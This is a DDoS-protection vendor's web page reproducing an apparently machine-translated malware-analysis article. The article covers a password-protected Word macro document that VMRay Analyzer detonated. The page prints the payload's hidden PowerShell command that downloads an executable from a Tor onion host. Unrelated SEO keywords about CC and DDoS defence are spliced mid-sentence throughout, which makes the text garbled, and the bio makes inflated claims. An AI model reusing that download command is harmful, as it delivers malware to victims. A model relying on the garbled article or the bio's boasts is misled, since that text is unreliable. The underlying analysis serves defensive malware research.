DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > CC防护 > 正文

ddos高防_扬州高防服务器_指南

01-12 CC防护

ddos高防_扬州高防服务器_指南

哈希值SHA256:3a813df1c8f1e835cc98dd60b799c64e61DB51A259EE30B7235004CB3C9DF64查看完整的受密码保护的Word文档分析报告密码保护文档是恶意软件绕过反病毒(AV)和其他检测解决方案的有效方法。通常情况下,AV无法解析用于发送恶意文档的电子邮件文本所需的密码。使用VMRay Analyzer,始终可以使用基于浏览器的VNC访问手动与恶意软件交互。通过禁用自动交互,用户可以在与恶意软件交互的过程中手动输入密码。在VMRay Analyzer v2.1中,我们完全自动化了这个过程。现在用户可以在提交时提供密码,密码将在行为分析期间输入(图1)。此新增功能将删除手动过程,从而节省DFIR专家和恶意软件分析师宝贵的时间。我们最近发现了一个示例(感谢michaelgillespie)来演示VMRay analyzerv2.1中增强的密码保护文档的自动分析。图1:在提交示例之前输入文档密码microsoftword文档是通过一封电子邮件传播的,该邮件旨在诱使用户通过社交工程打开恶意附件。根据Forrester的说法,像这样的社会工程攻击是过去12个月公司面临的第二大常见类型。一个谨慎的安全分析员在收到这样一封潜在危险邮件的报告后,可能会将文件上传到VirusTotal或其他公共分析工具。但是,由于文档受密码保护,因此它会自动加密。在不知道密码的情况下,无论是公共分析器还是用户自己的AV都无法正确分析此文档。密码只在电子邮件中提到("见附件[…]。密码是5558。")。所以如果你只能访问附件,你就不能正确地分析它。这也是为什么这种攻击技术在不被发现方面很出色的原因——只要更改密码就会导致不同的文档。Virus总分为0/56(图2),换句话说,没有AV检测到它是恶意的。图2:受密码保护的Word文档的Virus总分为0/56使用VMRay Analyzer v2.1,宝塔能防御cc攻击,我们可以获取电子邮件正文中的密码,并在分析之前输入密码。分析完成后,防御ddos报价,我们可以看到恶意软件作者试图欺骗用户相信"无法查看"消息来自microsoftword,因此他应该允许宏运行。当然,5g防御能防止ddos吗,我们模拟的用户交互是每个攻击者眼中最好的场景(也是每个系统管理员眼中最坏的场景):VMRay Analyzer将执行任何要求的操作,比如打开文档并让宏运行。图3:Word文档提示启用宏让我们看看在用户启用宏以了解此恶意软件的作用后生成的进程(图4):图4:过程图宏启动批处理文件,然后启动PowerShell下载并执行实际负载:powershell.exe-w hidden"(新对象System.Net.WebClient).下载文件('hxxp://fbkvm7ezghq4dx3.onion.link/msbus24.exe','C: \Users\HJRD1K~1\AppData\Local\Temp\msbus24.exe')"有趣的是,这连接到一个TOR隐藏的服务,这在勒索软件中经常出现——当然,这种行为是一个巨大的危险信号,因为基本上没有合法的理由在TOR后面隐藏可执行文件。此行为在分析报告的"检测到的威胁"部分被标记为恶意行为(图5)。图5:VTI得分92/100下载的文件(fbbkvm7ezghq4dx3。洋葱网/msbus24.exe)也被标记为恶意。尽管在分析时无法访问该文件,但样本的VTI得分为92/100,美国防御CC虚拟空间,非常恶意。如本文分析所示,宝塔如何设置防御CC,VMRay Analyzer v2.1中添加的对自动密码保护文档分析的支持,为DFIR专家和CERTs提供了另一种工具,以促进和自动化与恶意软件的斗争。查看完整的受密码保护的Word文档分析关于Emre gulleremre是VMRay的恶意软件研究人员。Emre的主要职责是识别新的恶意软件规避技术。在加入VMRay之前,Emre在德国盖尔森基兴(Gelsenkirchen)的互联网安全学院(instituteforinternetsecurity)工作了3年。他还在鲁尔大学(Ruhr University)攻读IT安全硕士学位期间,担任系统安全讲座的学生。

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: /ddos/61229.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 8162498访问次数
  • 建站天数

    QQ客服

    400-0797-119

    X